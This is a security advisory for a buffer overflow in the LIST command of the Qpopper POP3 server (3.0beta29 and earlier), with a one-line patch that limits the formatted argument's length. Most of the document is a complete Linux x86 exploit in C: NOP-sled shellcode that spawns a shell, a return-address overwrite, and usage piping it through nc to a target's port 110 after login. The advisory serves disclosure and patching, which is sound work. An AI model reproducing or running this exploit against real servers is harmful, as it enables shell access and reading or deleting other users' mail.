COMMAND

    qpopper

SYSTEMS AFFECTED

    Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable)

PROBLEM

    'Zhodiac' found  following.   The, nowadays,  so common  qpop pop3
    server is one  of the best  server which implements  some features
    added not in  normal pop3d. Like  almost all software  it has some
    security bugs.  In this case, once you pass the login process  you
    can execute malicious code due to a buffer overflow.

    With this buffer  overflow (second argument  of the LIST  command)
    you  can  execute  malicious  code  with  the  uid of the user you
    logged in,  and with  gid mail.   Due to  have gid  mail, in  some
    systems  you  can  read  all  the  mail  of  other  users and even
    change/delete it.

    For proof of  vulnerability here's the  Linux x86 xploit.   But be
    aware, no public xploit for your system does not mean you can't be
    hacked. Vulnerability exists, fix it!

    /*
     * !Hispahack Research Team
     * http://hispahack.ccc.de
     *
     * By Zhodiac <zhodiac@softhome.net>
     *
     * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
     * Overflow at pop_list()->pop_msg()
     *
     * Tested: 3.0beta28  offset=0
     *         3.0beta26  offset=0
     *         3.0beta25  offset=0
     *
     * #include <standar/disclaimer.h>
     *
     * This code is dedicated to my love [CrAsH]] and to all the people who
     * were raided in Spain in the last few days.
     *
     * Madrid 10/1/2000
     *
     */
    
    #include <stdio.h>
    
    #define BUFFERSIZE 1004
    #define NOP 0x90
    #define OFFSET 0xbfffd9c4
    
    char shellcode[]=
     "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
     "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
     "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
    
    
    void usage(char *progname) {
     fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
     exit(1);
    }
    
    int main(int argc, char **argv) {
    char *ptr,buffer[BUFFERSIZE];
    unsigned long *long_ptr,offset=OFFSET;
    int aux;
    
     fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
     fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");
    
     if (argc<3) usage(argv[0]);
    
     if (argc==4) offset+=atol(argv[3]);
    
     ptr=buffer;
     memset(ptr,0,sizeof(buffer));
     memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
     ptr+=sizeof(buffer)-strlen(shellcode)-16;
     memcpy(ptr,shellcode,strlen(shellcode));
     ptr+=strlen(shellcode);
     long_ptr=(unsigned long*)ptr;
     for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
     ptr=(char *)long_ptr;
     *ptr='\0';
    
     fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
     fprintf(stderr,"Offset: 0x%lx\n\n",offset);
    
     printf("USER %s\n",argv[1]);
     sleep(1);
     printf("PASS %s\n",argv[2]);
     sleep(1);
     printf("LIST 1 %s\n",buffer);
     sleep(1);
     printf("uname -a; id\n");
    
     return(0);
    }

SOLUTION

    Best solution is to wait for a new patched version, meanwhile here
    you have a patch  that will stop this  attack (be aware that  this
    patch was not done after a total revision of the code, maybe there
    are some other overflows).

        77c77
        <               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
        ---
        >               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",